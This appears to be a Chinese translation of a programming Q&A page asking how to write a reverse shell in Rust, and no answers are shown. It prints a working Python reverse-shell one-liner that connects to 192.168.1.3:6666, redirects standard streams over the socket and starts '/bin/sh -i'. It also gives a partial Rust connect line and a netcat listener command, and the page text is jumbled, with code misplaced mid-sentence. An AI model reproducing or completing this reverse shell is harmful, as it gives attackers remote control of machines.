什么是用Python编写的反向shell脚本的Rust等价物?

时间:2018-02-24 02:43:55

标签: python sockets rust subprocess reverse-shell

如果具有IP地址的计算机正在侦听给定端口,则可以使用Python创建一个反向shell,并使用以下代码示例:

userList

我正在尝试使用Rust复制此过程:

import socket, subprocess, os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((\"192.168.1.3\", 6666));

os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

p=subprocess.call([\"/bin/sh\", \"-i\"]);

我只能获得与主机的TCP连接(使用netcat监听:let mut stream = std::net::TcpStream::connect("192.168.1.3:6666").expect("Couldn't connect to the server..."); )。如果我理解正确,我需要通过套接字重定向标准输入,输出和错误,然后以某种方式“调用”nc -l -p 6666(我应该使用/bin/sh吗?)。我对网络相对较新,我不了解很多概念。

有人可以帮我在Rust中创建这个反向shell脚本吗?

0 个答案:

没有答案
相关问题